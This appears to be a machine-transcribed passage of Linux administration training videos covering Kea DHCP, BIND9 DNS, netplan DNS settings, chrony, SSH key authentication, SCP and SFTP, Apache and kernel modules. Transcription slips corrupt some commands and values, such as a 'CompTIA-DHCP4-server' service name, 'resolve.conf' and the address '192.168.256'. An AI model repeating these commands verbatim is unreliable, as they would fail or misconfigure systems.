it locally. So the next thing I want to do is change directory into /etc, then into KEA, K-E-A. If I do an ls in here, we've got a file here called KEA-DHCP4.conf. Notice we also have the option of configuring DHCP for IPv6 clients. We're going to stick with IPv4. So I'll run sudo nano KEA-DHCP4.conf, enter. So we have a number of comments at the top here. The comments are notated here with 2 slashes at the beginning of the line. As I go further down in that conf file, I'll come across a subnet listing for my subnet. And then down below, I've got the pools where I can specify the range of IPs that I'm willing to hand out to DHCP clients. Now I can accept the default settings here that it determined, or I can change them. Then down under the option-data section, I've got the IP address of a default gateway or a router. We can also configure DHCP reservations. Reservations are useful if you know you want the same IP tied to a machine with a specific hardware or MAC address. Think of things like network printers or other servers whose IP address really should not change. You just want to use DHCP to deliver it to them in a convenient fashion. But back up here under the option data where we had our router or default gateway, after the closing bracket for that section, we can put in a comma, and then on the next line, we can start a new open curly bracket. we could specify name, space, course name is in double quotes, domain name servers, that goes in quotes, comma, and then data in quotes, space, we could specify the IP addresses of one or more DNS servers. Then we'll close off that section with a closing curly bracket, and so we can make changes as we see fit to how we want DHCP configured in our environment. I just realized that it should be domain-name servers in plural. The DHCP server won't load correctly if any of these things are entered incorrectly. Okay, now that that's been caught, let's Control-X to save that. Yes, we'll write it out to the conf file and enter. Now the next thing we need to do is we need to make sure that the DHCP server for CompTIA reads those new settings. So I'm going to enter the sudo service CompTIA-DHCP4-server status command. Let's check to see what the status is. Okay, it's inactive, it's dead, fine. Let's bring it up and let's get it running. So we're going to run that same command, except we will change status to the word start. And let's check the status now to make sure it was able to get up and running. And it was. It says it's active and running. So I'll press Q for quit. Now let's take a moment here to talk about the fact that you can use commands such as sudo journal ctl for log reading. You can specify -u kia-dhcp4-server to view related messages for DHCP v4. And this is going to be important if you're having some kind of error condition and you're not sure what the problem is. You could also run sudo cat/var/log/syslog and grep that, pipe it to grep -i for case insensitive, perhaps look for KEA, Kia, and that would give you another way to view messages specifically related to your DHCP server daemon. Okay, so at this point, we've got an active DHCP server running that is configured with some IP configuration settings that can be handed out to DHCP clients. In this demonstration, we're going to take a peek at how to work with the DHCP client side of things in Linux. The first thing I've done here is I've gone to my Ubuntu desktop machine where I've got the GUI installed. However, the first thing I think that we will do is check out some command line stuff. So I'll open up a terminal window here in Ubuntu desktop. The first thing we should consider is whether or not the Network Manager service is up and running. The Network Manager service is what actually controls the network configuration on Ubuntu Linux. Now, that's not going to be the same for every Linux distribution out there. They do vary slightly when it comes to some of these configuration details. So here at the command line, I'll run sudo service network manager. Notice that it's capital N for network and capital M for manager. That's important. If we check the status of it, the first thing we want to do is make sure that it's active and running, but you're also going to have some very important messages, basically logged items down before shown. So if you have any error messages or warnings, you're going to see them shown down here. And that can be absolutely invaluable when you have to troubleshoot, why is this DHCP client not getting the correct IP settings from a DHCP server? You could also, of course, run sudo cat/var/log/syslog, and you could pipe that to grep and look for DHCP entries within there. So you'll see a number of DHCP transactions. And again, you might be looking here for any error messages. One of the more recent DHCP messages in the system log that I see here is some new lease information, it's date and time stamped, and the IP address assigned to this client. In this case, it shows the address of 192.168.2.40. Let's check it out. If I type IPA for IP address, indeed, that is the IP address assigned to this host. And of course, DHCP is really neat because we don't have to configure IP settings on all of the devices on the network. They just get it centrally from our configuration on the DHCP server. That DHCP server could be DHCP software installed on a host. It could be built into a router, including a wireless router. It could be built into a VPN appliance. There are many forms of DHCP servers. But when it comes to configuring DHCP clients, we don't really care what it is. We just care that we know it's there and that it's working. Now, if I have a desktop GUI, as I do, I can also check whether I'm using DHCP or manual IP configurations in the GUI. So here in Ubuntu Desktop, I'll just click to open up my menu of options here, and I'll search for the word network, and I'll choose the advanced networking options. Okay, so here I've got an Ethernet wired connection called Wired Connection 1. If I double click on it, it pops up the details for it, where I can click on IPv4 settings, kind of over to the right a bit. Notice it's set for automatic DHCP, as opposed to a manual configuration where I would click the details like the IP address, the netmask, the gateway, and so on and so forth. But even if I'm using DHCP, notice I can specify additional DNS servers beyond what might have been delivered via DHCP. I can go to the command line again, and I can cat/etc/resolve, spelled resolv.conf, to see any name servers that might be configured in here locally on this device. At the command line, I could also issue commands like sudo nslookup, name server lookup, where if I type server, it'll show me the default DNS server that we're connected to for query purposes. If I were to type www.skillsoft.com, it'll go out and try to resolve that name. Now, of course, if the DNS server I'm pointing to doesn't know how to resolve www.skillsoft.com to an IP address, it should recursively by itself go out and talk to other DNS servers until it comes up with answers. And here it's come up with a couple of different IPv4 addresses for the skillsoft.com website, as well as some IPv6 addresses. So we know that DNS is working. You want to be careful because if I type exit to get out of that, if I rely on ping www.skillsoft.com, I'm not getting replies, but what's important to note is that it is resolving the DNS name here to an IP. So we're not getting a reply. We're going to assume that ICMP ping traffic is blocked at some firewall between us and skillsoft.com. I'll press Ctrl-C to stop pinging. Let's flip over to an Ubuntu Linux server, where again we could issue sudo service network manager status. However, notice it returns network manager.service could not be found. And it's spelled correctly. I've got the capital N and M. So even within Ubuntu Desktop versus Ubuntu Server, there is a difference on how network configurations are handled. So here on the server side, if I were to change directory to /etc/netplan and do an ls, I've got a configuration YAML file for my network configuration on this Ubuntu Linux server. If I were to cat that file and pipe it to more, well, there's not very much in there anyway because we're using DHCP. Notice that under network, Ethernets, and here's our interface. It's called ENS33. We've got DHCP4 set to a value of true. Of course, if I type IP space A to show IP information on this host, notice for interface ENS33, we do have a valid IPv4 address that was acquired through DHCP. If you happen to be in a situation where you're troubleshooting DHCP, you should also be aware you can run sudo dhclient to manually force the DHCP client to do what it does, to send out a broadcast, talk on the network, and acquire an IP configuration. You can also pass it -r for renew and give it the interface name just to perform a renewal if you just want to refresh it. In this demonstration, I will be installing a DNS server on Ubuntu Linux. There are plenty of DNS servers you can choose from, and the same thing would be true when it comes to HTTP web server stacks or DHCP servers and whatnot. But they all share a lot of commonalities in terms of how they're configured, the fact that there would be a daemon running in the background, and for DNS, of course, the standard is to listen for client queries on UDP port number 53. Let's get started here. I'm going to run sudo apt update because I want to make sure my list of repositories from which I can pull down software packages is up to date. So that's not updating my installed software. It's only updating my package repositories. Excellent. Okay. Next thing I want to do is run sudo apt install. I want to install the bind9 standard DNS server as well as the bind9 utils package with some command line utilities included. And also bind9-doc, so some documentation. So each of these separate packages I'm specifying the command line separated with simply a space. I'll press enter. Okay, it asks if I want to continue. I'll type in Y for yes and enter. Okay, so it's downloading and installing those packages for me. And just like that, it's done. If I issue the sudo service bind9 status command, it shows that in fact our bind DNS server is up and running. Okay, so that's great. If I change directory to /etc/bind, we've got some config files here, such as our named, that stands for named daemon, by the way, .conf. So if we were to run sudo nano named.conf, this is a parent file, you could say, that includes the configuration settings in the other files here, such as named.conf.options, named.conf.local, and so on. So I'm going to get out of here, and let's run sudo nano for named.conf.options. First thing is the directory where some of the files will go. The default is /var/cache/bind. You can also add additional options, which I've done. I've added a keyword recursion and set it to yes to allow DNS client query recursion from this server to others. I've added the allow-transfer directive, and then within curly braces, I've specified none, semicolon. Each of these lines, of course, each ends with a semicolon as well. This means I will not allow zone transfers. I will not copy DNS records to secondary DNS servers, which is a good security setting. You might have an ACL section in here where you list trusted servers you want to allow transfer to, but this is still a good security setting to have. Down below, I can also specify specific DNS servers I want to forward client requests to if this server doesn't have an answer. Here I've specified, for instance, 8.8.8.8. That's followed by a semicolon. That's one of Google's DNS servers. So if I'm happy with this, I can go ahead and Control X to save that out. And what I'm going to need to do is I'm going to need to restart the bind9 DNS server daemon. So sudo service bind9 restart. No news is good news, but let's just check on the status anyhow. Okay, the DNS server is active and running. If you have a configuration file error, like a syntax error, missing a semicolon, or what have you, it'll normally prevent the bind DNS server from starting up. So if you can't start it up and you get errors, check the syntax in the conf files. Okay, so I'll type Q. Now in the etc bind directory, if I do an ls, there's also a named.conf.local file. Let's run sudo nano against that file. Now there's not really a whole lot in here. So the way to create a forward lookup zone is first of all to begin by adding to this name.conf.local file, add the zone keyword, and then in double quotes specify your zone. Maybe sales.quick24x7.com close double quotes. Then I would add a space and an open curly brace, and I'll move down to the next line where I'm going to specify that the type of zone is primary, followed by a semicolon. Then I will refer using the file directive to my zone file. So in quotes, I'll put /etc/bind/zones/db for database .sales.quick24x7.com close quote semicolon. File's not there yet, doesn't exist, but it will. And I'll add a closing curly brace and a semicolon. So I'll press Control X and I will save that file. Now we have to create our bind zone file. Now, if I do an ls here in /etc/bind, there is no zones subdirectory. So I'll go ahead and make one. sudo make dir zones. Let's change directory to zones. I'm going to sudo copy one level back. There's a file up here. You notice we've got a file called db.local. Well, I can use that as a starting point, sort of a template, if you will, and copy that file into the current directory as sales.quick24x7.com. So this name has to match what we specified. Actually, I think we specified db.sales.quick24x7.com. Enter. If we do an ls, okay, in etc bind zones, we've got our database file. Now we can edit it. So I'll use my nano editor to open that up. So like I said, this is kind of a little template, but I've gone ahead here and I've made a bunch of changes. So for my start of authority, my SOA record, I've put in the name of my host. So Ubuntu 2.sales.quick24x7.com. You should set your host name to be the same. Notice the trailing period at the end of that. I could change the admin details here, but I'll just leave it at root.localhost. That's fine. When you make a change to your zone file, you need to increment the serial number so that when you reload the bind9 DNS server daemon, it picks up changes. Down below, I've got a name server or an NS record that identifies servers that are authoritative for this zone that can write to it. And in this case, it's the same thing as above. It's Ubuntu 2.sales.quick24x7.com. And I need an A record for that. Remember, an A record is used to resolve FQDNs to IPv4 addresses. So I've got my A record here for Ubuntu 2.sales.quick24x7.com. It's an internet A record, and I've got the IP address of that host. And just for fun, I've added another A record for www.sales.quick24x7.com. It happens to be pointing to the same IP address. It certainly does not. It should point to wherever that web server is. It's just an example. Notice again, at the end of each of these FQDNs for the A record definitions, we have a trailing period. That's important. Okay, so I'm going to go ahead and save that out. Now we've got some great utilities that will let us check our work, both on the config files to make sure there are no syntax errors and on our zone files. For the same thing, make sure there are no syntax errors. For example, if I run sudo named-checkconf If you don't get any errors output back, it means that the syntax, at least for the conf files for your DNS server, are fine. But I can also use another bind utility, so sudo named-check zone, where I give it the name sales.quick24x7.com, followed by another parameter, which is the path and name of our zone database file. Enter. If there are syntax errors, trust me, you'll know. It will tell you on the screen. Here it says it loaded serial 4. Remember we made that change? And it says OK. Thank goodness, we don't have any syntax errors in the config files or in our DNS zone file. So the next thing to do, of course, is to restart our DNS server. sudo service bind9 restart. No errors. We're just going to verify the status. You just never know sometimes. Looks great. Active and running. If you've got a firewall running on this host, you want to make sure that client query traffic to UDP53 is allowed. So for example, I might run sudo ufw if you happen to be using the uncomplicated firewall product, and I would say allow bind9 traffic. You could specify port numbers if you really wanted to, but that's a built-in keyword that you can allow. And there you go. We've now got a DNS server up and running on our Linux server. In another demo, we'll take a look at how to configure a Linux client with DNS settings. In this demonstration, I'll be configuring some DNS client settings on Linux hosts. Now, the first thing we'll do is we'll take a look at how to manually configure DNS servers on a client using Ubuntu Linux, specifically the server edition of Ubuntu Linux. What I'm going to do to start is do an ls of /etc/resolve.conf. So we have a file here, but notice it shows up as a symbolic link. This can be verified by changing ls to ll for a long listing. Indeed, it is a symlink that points to resolve.conf under /run/systemd/resolve. Either way, if we use sudo to take a look at with the cat command /etc resolve.conf, there's a note up at the top that says you shouldn't be editing this file. However, notice that for the name server, that's the DNS server listing, it's got a stub IP for 127.0.0.53. In the past, the resolve.conf file is where you would actually add your DNS name servers if you weren't using DHCP that this host should connect to resolve names to IP addresses. And it will vary between different Linux distributions and versions in terms of exactly where you go to configure this. So what I'm going to do then is run sudo nano, I'm going to run my editor, /etc/netplan, and I'm going to open up my YAML configuration file here. Here I've already configured static IP addressing. So down under Network, Ethernets, and the name of my interface, which is ENS33, I've got DHCP4 set to a value of no. If you're using DHCP, that will say yes or true. So I've got it set to no, and for the addresses item, I've specified a static IP address for this particular host using CIDR notation, so with the slash and the number of bits in the subnet mask. Down under routes, I've added a default route entry via my default gateway. And what we're really interested in here, name servers. Down under name servers, I've got a couple of addresses within square brackets, comma separated, because I've got two DNS servers I'm pointing to. I'm pointing first to my own IP address because this server I am doing this on is actually a DNS server. And then the second one, I'm just pointing to one of Google's DNS servers out on the internet at 8.8.8.8. Now remember, when you're working with netplan YAML files, don't use tabs to space these things. Use spaces. And the spacing is very important here. The indentation isn't only for making it readable, it actually has an influence on how this file is parsed. So it's very unforgiving. At any rate, once you've made a change there, I already had the change there, you can run sudo netplan apply to apply those changes, such as configuring DNS server entries. But what's interesting is even after you've done that and applied your netplan changes, if you do a cat of, let's say, /etc, it will not reflect your new DNS server entries. For that, you can run sudo resolve ctl status. And here, it will list the DNS servers as per your netplan configuration. Now, this is important because it allows you to resolve names. For example, if I were to use ping www.google.com, we're getting a reply. Okay, well, that's good. We pinged it by name. It resolved it to the IP. We're getting a reply. If we were to ping another name like www.skillsoft.com, well, it's resolving the name to an IP, but we're not getting a reply. And that's usually because it's firewalled. Ping uses ICMP, the Internet Control Message Protocol, which is often blocked at firewalls. But we know it's working. We could also verify that it's working using commands like name server lookup, NS lookup. If I were to just type in the word server and press enter, notice that for the default server, it's showing the local DNS server stub that we saw in resolve.conf 127.0.0.53. If you really wanted to, you could use the server keyword here and you could change it, any DNS server that you like. Notice it's making a connection on port 53, that's UDP port 53. However, when I change the DNS server in here, if I exit out and come back in to NSLookup and type server, notice we're back to the initial config. Either way, here in NSLookup, we can simply type in what we want to look up, for example, a DNS name, www.skillsoft.com, and we have a number of non-authoritative answers back for IPv4 and IPv6 for the skillsoft.com name. Non-authoritative simply means the DNS server we're connected to doesn't actually have the zone file for skillsoft.com, but it went out and talked to other DNS servers to find the answer. You could also run setType equal PTR if you wanted to search up reverse lookup or pointer records, where you would specify the IP, and if there is a reverse lookup zone available with the record for that IP, it would return back the name. Notice what it does is reverses the IP address and tacks on the reverse lookup zone name of in-addr.arpa and returns back a name, which in this case appears to be an EC2 instance or virtual machine running in Amazon Web Services. So the NSLookup tool then can be very useful. I'll type exit. You can also use the dig command, but it's not interactive like NSLookup. For example, dig www.skillsoft.com. And this is just another tool that will give us details about what we asked for, in this case, the skillsoft.com DNS name. So we've got the A records returned for IPv4 here as a result of running that command. Now here on a Linux desktop GUI machine, this happens to be running Ubuntu desktop, we can also issue a lot of the same commands we did on Ubuntu server, like sudo resolve ctl status, which turns back the DNS servers that we are pointing to. Of course, we can also open up some GUI tools to look at that as well. If I search my GUI tools here, let's say for net, I can choose my advanced network icon. And if I go into my wired Ethernet connection and go under IPv4 settings, even if we're using DHCP, we can go ahead and add additional DNS servers here. So depending on exactly which desktop GUI environment you're using on top of your Linux OS will determine exactly where you click and what it looks like when you set DNS. But the underlying mechanisms remain the same. In this demo, we're going to take a few minutes to examine how NTP works in Linux. Let's start here on a Linux server by simply issuing the date command. Of course, the date command returns the date, the time, as well as some time zone information. Now, what's critical here, of course, with Network Time Protocol or MTP, is that all of the devices on the network agree on the time. Of course, we need that time to be correct, as different log files will be time-stamped or end-user productivity documents like generating invoices. A lot of these things will be time-stamped, and so it needs to be correct. Another command we can issue here in Linux is time date CTL. Here we've got a listing of the local date and time. That's for our specific time zone. Then we've got universal time. And of course, our time zone is actually shown down below. We also have a reference as to whether our system clock is synchronized and whether we're using NTP or not. Notice that for NTP service, it says active. Now, this is not something I've configured. It's actually a default setting. So if I were to run sudo service systemd-timesync-d status, so this is a background daemon that's running automatically, we get a listing here that says NTP is active. We get a listing here showing that the daemon is active and running. We have a date and time since that was true. And down below, next to status, the initial synchronization to a time server, so there's a source out on the internet. This is automatically done by default. It's pointing to an IP of that host. Interesting. So in other words, Linux is set up as an NTP client out of the box and is synchronizing time, assuming it can talk to the internet. And the answer is that's true with most distributions. Yes, it will automatically be synchronizing time over the network. Of course, you have control over how that's configured. One of the things that's going to be important here is using sudo timedate-ctl list-time zones. Now, what we can also do actually is we can filter that by piping it to grep, let's say -I for a case-insensitive match for the word Canada. So here are the time zones that we can set This is the notation that we would have to use within Canada. So I could run sudo time date ctl set dash time zone, for example, Canada dash Atlantic. This is how you would actually set that at the command line. Because not only is it important that the date and time be correct, but of course, in order for that to work properly, to have the proper date and timestamps on our Linux host, we've got to be configured in the correct time zone. Now, not only can we act as an NTP client here in Linux, but we can also install and configure an NTP server. Why would we do this? We might do this because within our enterprise network, we want to control the time. Or maybe we're on an air-gapped network that can't talk to the internet, and so we need our own reliable time source. There are even external precise time devices like atomic clocks that can be connected to servers that serve as time servers so that they have their time from a reliable source. So let's say, for example, we would run sudo apt install Crony. Crony is an example of an NTP time server package that we can choose to run. It's not the only one out there, though. Do you want to continue? Yes. And after a moment, that part is done. So if I run sudo service Crony D for daemon status, notice it's automatically up and running. And even though this isn't an actual log file, of course, it can still be handy to take a look at some of the startup messages here, such as selecting a time source. Here we've got an IP address out on the internet that this server is talking to. NTP servers themselves can get their time from other reliable NTP time sources, NTP servers in other words. I'll press Q to quit out of that and clear the screen. I can also run sudo nano and open up /etc/crony/crony.conf. What it's doing down here is making references to NTP pools of publicly available NTP time sources. However, if you really wanted to, you could specify your own individual time sources here, such as within an enterprise network where you don't want to rely on time servers available out on the internet. However, I'll just Control X out of that, clear the screen. We can also issue commands like crony c space activity to make sure that our time sources are available, and it returns back 200 OK 8 sources online. That's great. That means that we can talk to those time sources. And if we are configured to get time from them, which is the default behavior for the Crony daemon, that's good. We can also issue commands like crony c clients to see if there are any client devices that are relying on us for time that are connected. We could also type crony c sources to see where we are connecting to get our time. And these are some of the NTP servers available publicly out on the internet. In this demonstration, I'm going to be configuring SSH. What I want to be able to do is from one Linux host, I want to be able to use SSH to have a secured command line connection to a remote Linux server. Now, there are a number of ways to do this, one of which is through public key authentication. So what I'm going to do is generate a public and private key pair here on my client, which is unique to this client. The private key will be passphrase protected, and no one should have access to it except for the owning user on that station. However, the public key can be shared with anybody, but what needs to be done with the public key is it needs to be copied to the server so that the user is authorized to SSH into that server, because the private key on the client machine and the related public key on the server are both required to allow SSH public key authentication. Let's get started here. So here on my client machine, notice if I type pwd print working directory, I'm in my user home directory, /home/cblackwell. If I do an ls-a for all items, including hidden items, notice we have a hidden.ssh directory. If I change directory into it, there's nothing here other than known hosts and known hosts.old, but there are no key files. We're going to go ahead and run ssh-keygen to generate the key pair. So it asks me for the path and file name in which to save the key. Well, the key here in this context is the private key. Notice it wants to go in my current user home directory. So /home/cblackwell in the .ssh hidden directory, and it wants to call the private key file id_rsa. I'm okay with the default. I will press enter. Then it says you need to protect that file. It's a private key file with a passphrase. So I will enter and confirm a passphrase for the private key file. This means that even if somebody were to steal my private key file, if they don't know the passphrase, they can't actually use it. So it returns back a unique fingerprint, which is great. Let's see what happened here. ls. Okay, we know that we've got the private key file here called id_rsa. We've got a mathematically related public key in the name of id_rsa.pub. But what we need to do is keep our private key here on our client machine. Doesn't need to be on the server. However, the public key needs to be on the server, specifically in the user home directory in the .ssh hidden directory server side. Well, we can use the ssh copy ID command to do this, such as ssh-copy-id. The user I want to authenticate as on the remote server, because I know I have a C Blackwell account there, is cblackwell@, and I'll put in the remote host's name or IP address, and I'll press enter. So it asks me to trust the authenticity of the unique fingerprint for that server, as I've never SSH'd to it before. Are you sure you want to continue connecting? I'll type in yes, and it asks for the password for that account on the remote server. So I'll enter it and press enter. All right, it says number of keys added 1. Now try to log in with SSH and so on. Let's take a look server side at what happened for just a moment. Here on my Ubuntu server, I am in the C Blackwell home directory. Here on the Ubuntu Linux server where we've copied the ID file, I'm already in the C Blackwell home directory. If I change directory into .ssh, the hidden SSH directory, notice we've got a file called authorized_keys. Well, wait a minute. I thought the SSH copy ID command was supposed to copy the public key here. It did. It put it in the authorized keys file. If I cat the authorized keys file, that is the public key that resulted from our SSH keygen command. Notice down at the bottom, it's got a reference to the username C Blackwell and the host on which that was done, Ubuntu Desktop 1. So the public key needs to be server-side in the authorized_keys file for that user. The private key should never be on the server. So back here on the client desktop, yes, the private key is here on the client, ID_RSA. All that we have to do in the future on this machine for this user is simply sign into the remote Linux server using SSH, C Blackwell @ and whatever the name or IP of the host is. When I do that, it'll pop up and ask me for the password to unlock the private key file. That's a good thing. So I'm going to go ahead and enter that in. After which, I am now signed in remotely to that Linux host. Notice that my prompt has changed. I'm now user C Blackwell, not at Ubuntu Desktop 1, but at Ubuntu 2. If I type IPA, I'm at the server. I've got the server's IP here, 192.168.256. Notice also that it did not prompt me for a password. With SSH public key authentication, as long as you have the username, you possess the private key, and in our case, know the passphrase for the private key, you're signed in. It's something you know, the username, and something you have, the private key file. If I type exit, I've closed out of that SSH connection, so now I'm back as being C Blackwell on my local Ubuntu Desktop 1. Now that we've discussed how to set up SSH public key authentication, it would make sense then to talk about how to transfer files using SCP and SFTP. Let's start first with the SCP, the Secure Shell Copy command. This, of course, is based on SSH authentication. So first of all, here I'm on my Ubuntu Linux server, where if I type pwd for print working directory, I'm in the home directory for a user on the server called C Blackwell. If I do an ls, we've got a projects directory, and if I ls that, we've got some sample project files. So we'll use some of these as our example of transferring files from the Linux server to a Linux client machine. So let's switch to the client machine for a moment. Okay, I'm signed in as a user by the name of C Blackwell here on my client machine. I can type ID to verify the username. Of course, pwd to print working directory. Looks like I'm in my SSH hidden directory in my user home directory here on the client. Okay, so what we're going to do is start by using SCP. Actually, why don't we take a look at the man page for it really quickly? The manual or help page. Man SCP. Open SSH secure file copy. Indeed, that is what it's for. Now, as you might guess, because it's pretty much the same thing with most Linux commands, there are quite a few command line parameters. That's a good thing because it means we've got power, we've got flexibility, lots of options. And there's no shame in going into the man page to look up what the specific parameter or syntax might be for something. For example, there's -i, where you can select the file from which the identity or the private key for public key authentication is read. Okay, well, that would be important if you're using public key authentication with public and private key pairs, where the public key is on the server and the private key is on the technician station. Even -R, where SCP is actually used on the remote server for the copy session, as opposed to SCP being used locally. Where r means you can recursively copy entire subdirectory structures, so subdirectories within them and files. So a lot of helpful stuff there. So Q to quit out of that. So as an example, let's say I were to run SCP C Blackwell, that's the remote username on the server. The server I'll specify here with its IP address, then colon, and I know that there are files under /home/C Blackwell/projects such as project_A, there's some capital letters in there, .txt, and I want to copy that, let's say, locally to my current directory, so dot. When I press enter, we get a message back stating that 100% completion has occurred, the file is there. Let's see, ls. Yeah, indeed, project A was securely copied over the SSH connection from the remote Linux server locally, but it didn't prompt me for authentication. Now I'm going to log out of that session and log back in as user Cody Blackwell on that Ubuntu desktop. And I'm going to go ahead and fire up a new terminal window now that we've signed in, where I'm going to once again issue an SCP command for C Blackwell against that host, but the difference here is I'm going to tell it to copy down project_B.txt, enter. We didn't get this last time. It's prompting me to enter the passphrase to unlock the private key file. It knows I've got a private key file on my local machine and a related public key in the home directory on the server, specifically in the .ssh hidden directory in the home directory on the server. It didn't do this the first time because I had already authenticated previously, but the reality is the first time you enter this in a session, SCP, you will be prompted to authenticate. Okay, let me enter in the passphrase to unlock the private key, and I'll press enter. Now we have 100% completion, and if I do an ls, indeed, there's project A, there's project B. But remember in the man page, lowercase r was recursive, and this is a very common parameter that's used with secure copy. There are times you'll want to copy entire subdirectory structures and everything in them. That's precisely what we're going to do here. So let's copy down an entire subdirectory structure then with scp-lowercase r recursively. Username on the remote server is cblackwell at, and I'll specify the remote server's IP address. Now on that remote server, I have to tell it the directory I want to copy. So :/home/cblackwell/projects/. I want to copy the entire project subdirectory and everything within it. That's going to happen because of the -lowercase r. Where would you like to put that locally? How about ./current directory just in a folder called projects? Enter. Okay, wow, it looks like it found all of those sample project files in the server in the projects directory. If I type ls, looks like we have a projects directory here on the local machine. And if I ls the local projects directory, that's where those sample project files are. So SCP is very easy to use, and the beauty of it is that you're transferring files over a secured connection, an encrypted connection. Now, alternatively, you might choose to use SFTP, Secure FTP, as a secure way to transfer files, where I would type SFTP, my username on the server, cblackwell at, and then of course the server's identity. In this case, we're going to use the IP address. Now, what this will do, if that's all I provide on the command line, is it will give me an interactive SFTP command prompt that says I'm connected to the server's IP address. So that within SFTP, if I type pwd print working directory, it returns the remote working directory, which is home C Blackwell. Therefore, if I type ls, we're seeing what's on the server. That's not local. To see what's local, for example, I could say lpwd, and when I do, it says local working directory, and of course, it's got the path to my local working directory for my user. So if I type lpwd, local print working directory, it returns the local working directory as being /home/C Blackwell. However, if I still type ls, that's still happening server side. That's not the same contents of what we have in our local directory. For that, I could type in ls, local list files. That looks different. So the command set is a little bit different when you're working with SFTP. So let's say I want to copy one of my local files here, sample_local_file.txt. That's on my local machine. I want to upload that to the server. So I can do that by using the put command. Put sample. Now I can just use my tab completion here. And if I don't give it another parameter, it will call it the same thing and put it in the server's current working directory. Okay, so it looks like it copied it up to home C Blackwell, and there's the name of the file. So on the server, we can see the contents there just simply by typing ls. That's server side, remember, because LLS would be local. Sure enough, there's the sample local file. If I want to download files, I can use get. Let's say I'm interested in filelist.txt. I can issue the command get filelist.txt. And if I don't specify any parameters, the file will be called the same thing and stored in the local working directory. So if I type LLS, local list files, sure enough, there's filelist.txt. Type exit to get out of my SFTP session. So that gives you an idea then of how you might use secured methods of transferring files between Linux hosts using SCP and SFTP. In this demo, I'm going to be installing an Apache web server. So the first thing we have to consider, of course, is the planning aspect of it. Why do you need a web server? Is it for a public-facing web app? Is it for an internal line of business app? Is it for software developers for testing? And then, of course, pick a host on which the web server will run. So I'm sitting at the Ubuntu Linux server where I want my Apache 2 web server stack up and running. So the first thing I'll do then is get it installed. sudo apt update. I'm going to update my list of package repositories. I do have a connection to the internet from this server. Now, I don't want to do an upgrade because I'm not interested in upgrading anything already installed on this server. So now I'm going to run sudo apt install, and I know that the Apache 2 web server is simply called Apache 2. Okay, it won't take very long for that to happen. If I now run sudo service Apache 2 status, the Apache web server is inactive or dead, so it's not up and running. So let's go ahead and run sudo service Apache 2 start. Then we'll check its status, and now it shows as being up and active and running. Now, what we should really do here is make sure that we are allowing traffic to the web server. So we can run sudo ufw, because I know the uncomplicated firewall is running on this host, and I could put in allow, and let's say 80/TCP. Now, if we're going to be using port 443 because we've got a PKI certificate for HTTPS, then we would allow that traffic as well. If I do an ls of /etc/Apache2, notice that we've got a number of config files in here. So if I were to run sudo nano /etc/Apache2/Apache2.conf, this is the main config file for the Apache web server. However, notice that there are some variables and items being referenced here that are used by other files. For example, the user and group references here need to be set in /etc/Apache2 environment variables. Most more complex software packages will not have a single configuration file, but rather numerous config files where you might have a global or a parent config file that references others. Notice there are also include statements, like to include the ports.conf file. There are subdirectory options for web server directories. Notice that there's a reference here for /var/www. Okay, well, we're not going to change anything here, so let's Control-X out of it. From one of our previous commands, notice, for example, the ports.conf file in /etc/Apache2. If we were to cat that file and pipe it to more, in case there's a lot of content, notice the default listening port for the web server is set to port 80. There's also an if module block here that states that if we do have the SSL module enabled for the server to listen also on port 443. Ideally, you won't be using SSL, rather TLS. SSL is deprecated and has known security issues. If I were to do an ls of /var/www, notice we've got an HTML directory in which we've got an index.html. That's the default location for website files. Also, if I do an ls of /var/log/Apache2, it's got its own subdirectory for logs. This is where we've got various logs for the Apache web server. I'm going to type IPA. So the server's IP here is 192.168.2.156. Let's just test a connection to it from a web browser to pop up the default web page. So when I enter that IP address into my browser's address bar, it pops up the Apache 2 default page and it says, Ubuntu, it works. Now, of course, it's not a secured connection because we don't have a PKI certificate and an HTTPS binding configured. Okay, so we've got our basic Apache 2 default web server up and running. At this point, it would be up to software developers to develop the website appropriately and place the files in the web server directory. The Linux kernel is the heart and soul of the Linux operating system. It manages resource access. It deals with kernel modules, which includes hardware drivers, and essentially it makes Linux work. So there are a few things that we should know then about managing the Linux kernel. It's not something that we would do very often, but when you're troubleshooting or if you need to manually update the Linux kernel, then this is important to know. So the first thing we'll go over then is the uname command. If I issue the uname command here, I'll put sudo uname -mrs, This returns Linux kernel information. So in this case, the Linux kernel is version 5.15.0-76-generic, and of course, the platform here is 64-bit. Knowing the specific version of the Linux kernel can be very important for compatibility, especially with specialized equipment or certain types of software. For example, in a medical environment, in order to interact properly with certain types of medical diagnostic equipment, you might have to have a minimum version of a Linux kernel. And so it's important to know how to check it, of course. Now, it's important also to be aware that we can run sudo apt update to update our package repository listing, in this case, here in Ubuntu Linux. So Debian-based Linux distros will use apt for package management. Why is this important? It's important because you can also run sudo apt install and specify a specific kernel package that you want to install. So you can manually choose to install the Linux kernel. It's always recommended to take a backup and to ensure you know what you're doing when you do this, because if you incorrectly apply a Linux kernel, it's possible you could prevent the system from booting up properly. Now, another way to check details about the Linux kernel is to run sudo and cat against /proc/ and the file is called version_signature. Here again, we get a return listing of the Linux kernel. This one says Ubuntu 5.15.0-76.83. So this is giving us further detail about the Linux kernel version information. You could even have multiple Linux installations on one machine, such as in different disk partitions. And upon boot up, you could select the appropriate menu entry to start different installations of Linux. You might even have the same version of Linux like Ubuntu Linux, but different versions of the kernel, maybe for testing purposes, that you would select from your grub boot menu. So if I were to run sudo cat /boot/grub/grub.cfg, let's pipe that to more. As we get further down to the various menu entries in the grub config file, notice we've got references to specific menu entry items that can be selected. And as we keep looking at them, there'll be references to the Linux kernel version that will be started when that menu entry is selected. Okay, so that's important to know. You can also show any kernel modules or plugins that are loaded by typing lsmod, list module. Here we have a list of all of the kernel modules that are loaded. Now I can also pipe that, let's say, to grep and look for something specific. For example, notice that we've got a RAID 10 kernel module loaded. Now when you're troubleshooting, you might use some of these commands like lsmod or modprobe, so sudo modprobe -r to remove a loaded kernel module. Let's say we want to remove the RAID 10 module. So RAID 10, enter. Now if I use my up arrow key to go back to the lsmod command where we grepped it for RAID 10, notice it's no longer loaded in memory. So basically what we've done is removed that plugin from being active right now while the kernel is loaded and Linux is running. Now we can also run commands like sudo modinfo RAID 10 to get some details about that specific kernel module. If I just scroll back up a bit, then we'll get some details like the actual file name and the location of that kernel module. We'll get a description and any dependencies that might be related to it. Of course, if I want to actually load a kernel module, if I'm troubleshooting or testing a configuration, I can do that with the modprobe command, but this time I simply won't use -r. So let's say I want to load the RAID 10 kernel module again. We'll just go back to our lsmod command, and now it's up and running once again as part of the kernel. Now, in some cases, when you want to install or update, especially to custom kernel versions, and you want to be careful with that as it might not be recommended for stability purposes, but often what you'll be doing is adding an additional repository and then installing it from 